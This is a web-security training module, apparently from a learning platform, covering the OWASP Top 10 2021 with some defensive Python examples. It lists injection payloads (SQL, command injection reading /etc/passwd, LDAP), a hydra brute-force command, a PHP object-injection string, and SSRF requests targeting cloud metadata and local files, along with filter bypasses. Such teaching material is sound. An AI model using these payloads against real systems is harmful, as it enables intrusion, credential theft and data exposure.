OWASP Top 10

Intermediate · 1h 30m · Writeup

Learn the OWASP Top 10 vulnerabilities

Learning Objectives

  • Understand OWASP Top 10
  • Exploit each vulnerability type
  • Practice on real examples
  • Learn mitigations

The OWASP Top 10 represents the most critical web application security risks. Updated every few years by the Open Web Application Security Project, it's the definitive checklist for web security testing. Think of it as the "greatest hits" of web vulnerabilities!

OWASP Top 10 2021 reorganized categories and introduced new risks like Insecure Design (A04). Understanding these categories helps you systematically test web applications.

A01: Broken Access Control

Access control enforces that users cannot act outside their intended permissions. When broken, attackers access unauthorized functionality or data.

```bash
# IDOR (Insecure Direct Object Reference)
# Original URL (your profile)
GET /api/users/1001

# Modified URL (someone else's profile)
GET /api/users/1002
# If accessible, that's IDOR!

# Horizontal privilege escalation
# User A accessing User B's data at same privilege level

# Vertical privilege escalation
# Regular user accessing admin functionality
GET /admin/dashboard
GET /admin/users/delete/1001

# Testing tips:
# - Change ID parameters
# - Try accessing admin endpoints
# - Modify JWT tokens
# - Force browse to restricted pages
```

IDOR Testing

Create two accounts. Log into Account A, capture requests, log into Account B, replay Account A's requests with Account B's session. If successful, you found IDOR!
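
As an added example (not part of this module), the two-account replay check described above, run against a constructed in-memory API: one handler authenticates the session but never checks that the record belongs to the caller, the other adds that object-level authorization check. Session tokens, user ids and names are made up.

```python
# Constructed data: two accounts and their logged-in sessions.
USERS = {1001: {"name": "alice", "email": "alice@example.test"},
         1002: {"name": "bob", "email": "bob@example.test"}}
SESSIONS = {"sess-A": 1001, "sess-B": 1002}   # session token -> authenticated user id

def get_user_vulnerable(session, user_id):
    """GET /api/users/<id>: authenticates the session, then returns whatever
    id was asked for. There is no check that the id belongs to the caller."""
    if session not in SESSIONS:
        return 401, None
    return (200, USERS[user_id]) if user_id in USERS else (404, None)

def get_user_fixed(session, user_id):
    """Same endpoint with the missing object-level authorization check."""
    if session not in SESSIONS:
        return 401, None
    if SESSIONS[session] != user_id:
        return 403, None        # deny, and log it as an access-control failure
    return (200, USERS[user_id]) if user_id in USERS else (404, None)

def idor_check(handler, captured_ids_from_a, session_b):
    """Replay Account A's captured requests using Account B's session and
    return the ids B could read even though they are not B's own record."""
    leaked = []
    for user_id in captured_ids_from_a:
        status, _body = handler(session_b, user_id)
        if status == 200 and SESSIONS[session_b] != user_id:
            leaked.append(user_id)
    return leaked

# Requests captured while logged in as Account A (its own profile).
CAPTURED_FROM_A = [1001]
```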

A02: Cryptographic Failures

Formerly "Sensitive Data Exposure," this covers failures in cryptography that lead to sensitive data exposure.

```bash
# Common issues:

# Weak or deprecated algorithms
MD5, SHA1, DES, RC4 - all broken!

# Hardcoded or weak keys
password = "admin123"
api_key = "12345"

# Missing encryption
# HTTP instead of HTTPS
# Passwords stored in plaintext

# Testing:
# - Check for HTTPS everywhere
# - Analyze cookies (Secure flag, encryption)
# - Look for sensitive data in responses
# - Check database dumps for plaintext

# Example: Finding sensitive data
# Robots.txt or .git exposed
curl http://target.com/.git/config
curl http://target.com/backup.sql
```

A03: Injection

User-supplied data is sent to an interpreter as part of a command or query. SQL injection, command injection, and LDAP injection all fall into this category.

```bash
# SQL Injection
' OR '1'='1
' OR '1'='1' --
' UNION SELECT null,username,password FROM users--

# Command Injection
; ls -la
| cat /etc/passwd
`whoami`
$(id)

# LDAP Injection
*)(uid=*))(|(uid=*
admin)(|(password=*

# XPath Injection
' or '1'='1
' or ''='

# Testing methodology:
# 1. Identify input points
# 2. Submit special characters
# 3. Observe for errors or behavior changes
# 4. Exploit to extract data
```

Injection remains one of the most dangerous vulnerabilities. A single SQL injection can lead to complete database compromise, including reading, modifying, and deleting all data.
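
An added example, not from this module, showing why the `' OR '1'='1` payload from the listing works against a login query built by string concatenation and fails against the parameterized form. The in-memory table and the credentials are constructed for the demonstration.

```python
import sqlite3

def make_db():
    """Constructed in-memory users table (one account)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Tr0ub4dor&3')")
    return conn

def login_vulnerable(conn, username, password):
    """Query assembled by string formatting: a quote in the input closes the
    string literal, and the rest of the input is parsed as SQL. With the
    payload in the password field the WHERE clause becomes
    username = 'admin' AND password = '' OR '1'='1', which is always true."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None

def login_fixed(conn, username, password):
    """Parameterized query: the values are bound separately from the SQL
    text, so the same payload is compared as a literal (wrong) password."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# Payloads from the listing above, used as the password field.
PAYLOAD = "' OR '1'='1"
PAYLOAD_COMMENT = "' OR '1'='1' --"
```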

A04: Insecure Design

New in 2021! Focuses on flaws in design and architecture rather than implementation bugs. No amount of fixing code helps a fundamentally flawed design.

```
# Examples:

# Password recovery via security questions
# "What's your mother's maiden name?" - easily researched!

# No rate limiting on login
# Allows unlimited brute force attempts

# Trust boundaries ignored
# Frontend validation only, no backend checks

# Insufficient fraud controls
# Unlimited discount code usage
# Price manipulation via client-side values

# Defense:
# - Threat modeling during design
# - Security user stories
# - Reference secure design patterns
```

A05: Security Misconfiguration

```bash
# Common misconfigurations:

# Default credentials
admin:admin
admin:password
root:root

# Unnecessary features enabled
# Directory listing
curl http://target.com/images/

# Verbose error messages
# Stack traces revealing paths, versions

# Open cloud storage
aws s3 ls s3://target-bucket --no-sign-request

# Exposed admin interfaces
/admin
/manager
/phpmyadmin
/wp-admin

# Unnecessary HTTP methods
curl -X OPTIONS http://target.com/ -v
# PUT, DELETE, TRACE enabled

# Testing:
# - Check default pages
# - Review HTTP headers
# - Enumerate directories
# - Check for backups (.bak, ~)
```

A06: Vulnerable Components

This category covers the use of components with known vulnerabilities: libraries, frameworks, and other software modules with documented CVEs.

```bash
# Identification methods:
# - Version numbers in responses
# - /readme.txt, /changelog.txt
# - Error messages revealing versions
# - Wappalyzer browser extension

# CVE databases:
# - cvedetails.com
# - nvd.nist.gov
# - exploit-db.com

# Example vulnerable components:
# Log4Shell (Log4j) - CVE-2021-44228
# Apache Struts - CVE-2017-5638
# jQuery File Upload - CVE-2018-9206

# Automated scanning:
nmap --script=vulners TARGET_IP
nikto -h http://TARGET_IP

# searchsploit
searchsploit apache 2.4.49
searchsploit wordpress 5.0
```

Always note version numbers during reconnaissance. Even if there's no immediate exploit, vulnerabilities may be disclosed later.

A07: Authentication Failures

```bash
# Weak passwords allowed
password
123456
admin123

# No brute force protection
hydra -l admin -P rockyou.txt target http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# Session management issues:
# - Session ID in URL
# - Sessions don't expire
# - Session fixation possible
# - No re-authentication for sensitive actions

# Credential stuffing
# Using leaked credentials from breaches

# Testing:
# - Try common passwords
# - Check lockout policies
# - Analyze session tokens
# - Test password reset flows
```

A08: Software and Data Integrity Failures

New category combining Insecure Deserialization with new risks around CI/CD pipelines and software updates without integrity verification.

```bash
# Insecure Deserialization
# Java serialized object (starts with rO0)
# PHP serialized object (a:2:{...})
# Python pickle

# Example PHP object injection:
O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}

# CI/CD risks:
# - Unsigned updates
# - Compromised build servers
# - No integrity checks on dependencies

# Testing:
# - Look for serialized data in cookies/parameters
# - Test object manipulation
# - Check update mechanisms
```
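
To inspect a serialized value found in a cookie or parameter without handing it to the application's own unserialize routine, here is an added example (not the module's code) that parses the PHP serialize() format from the listing above into plain Python data. It handles the scalar, array and object types shown and assumes ASCII strings, since PHP's `s:<len>` counts bytes.

```python
def php_unserialize(data):
    """Parse a PHP serialize() string into plain Python values; no class is
    ever instantiated, so the client-controlled properties can be reviewed."""
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value

def _parse(s, i):
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in "ib":                                  # i:42;  b:1;
        end = s.index(";", i)
        raw = s[i + 2:end]
        return (raw == "1" if t == "b" else int(raw)), end + 1
    if t == "s":                                   # s:<len>:"<bytes>";
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        start = colon + 2                          # skip :"
        if s[start + n:start + n + 2] != '";':
            raise ValueError("bad string length at offset %d" % i)
        return s[start:start + n], start + n + 2
    if t == "a":                                   # a:<count>:{k;v;...}
        colon = s.index(":", i + 2)
        return _members(s, colon + 2, int(s[i + 2:colon]), {})
    if t == "O":                                   # O:<len>:"<class>":<count>:{...}
        colon = s.index(":", i + 2)
        n = int(s[i + 2:colon])
        cls = s[colon + 2:colon + 2 + n]
        after = colon + 2 + n + 2                  # skip '":'
        colon2 = s.index(":", after)
        # The class name and every property (e.g. the "admin" flag) come
        # straight from the client; they are returned as data only.
        return _members(s, colon2 + 2, int(s[after:colon2]), {"__class__": cls})
    raise ValueError("unsupported type %r at offset %d" % (t, i))

def _members(s, i, count, out):
    """Read `count` key/value pairs up to the closing brace."""
    for _ in range(count):
        k, i = _parse(s, i)
        v, i = _parse(s, i)
        out[k] = v
    if s[i] != "}":
        raise ValueError("expected } at offset %d" % i)
    return out, i + 1

# The PHP object-injection payload from the listing above.
SAMPLE = 'O:4:"User":2:{s:4:"name";s:5:"admin";s:5:"admin";b:1;}'
```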

A09: Security Logging and Monitoring Failures

```
# What should be logged:
# - Login attempts (success and failure)
# - Access control failures
# - Input validation failures
# - Errors and exceptions

# Common failures:
# - No logging at all
# - Logs not monitored
# - Logs stored only locally
# - Insufficient detail

# Why it matters:
# - Attackers go undetected
# - No forensic trail
# - Compliance violations

# From attacker perspective:
# - Check if actions are logged
# - Test if alerts are triggered
# - Look for log poisoning opportunities
```

A10: Server-Side Request Forgery (SSRF)

```bash
# SSRF allows attackers to make requests FROM the server

# Basic SSRF
GET /fetch?url=http://internal-server:8080/admin

# Cloud metadata (AWS)
GET /fetch?url=http://169.254.169.254/latest/meta-data/

# Internal port scanning
GET /fetch?url=http://localhost:22
GET /fetch?url=http://localhost:3306

# File access (if file:// allowed)
GET /fetch?url=file:///etc/passwd

# Common vulnerable parameters:
# url=, uri=, src=, path=, dest=, redirect=
# domain=, site=, host=, img=, pdf=

# Bypass techniques:
http://127.0.0.1:80
http://2130706433 (decimal)
http://0x7f000001 (hex)
http://[::1] (IPv6)
http://spoofed.burpcollaborator.net
```

Blind SSRF

Use Burp Collaborator or webhook.site to detect blind SSRF where you can't see the response but can observe the request being made.

Key Takeaways

  • Broken Access Control is now the #1 risk (moved from #5)
  • Injection remains critical - always validate and sanitize input
  • Insecure Design is a new category requiring architecture review
  • SSRF (new to top 10) can access internal services and cloud metadata
  • Use OWASP Top 10 as a checklist for web application testing
  • Component vulnerabilities require continuous monitoring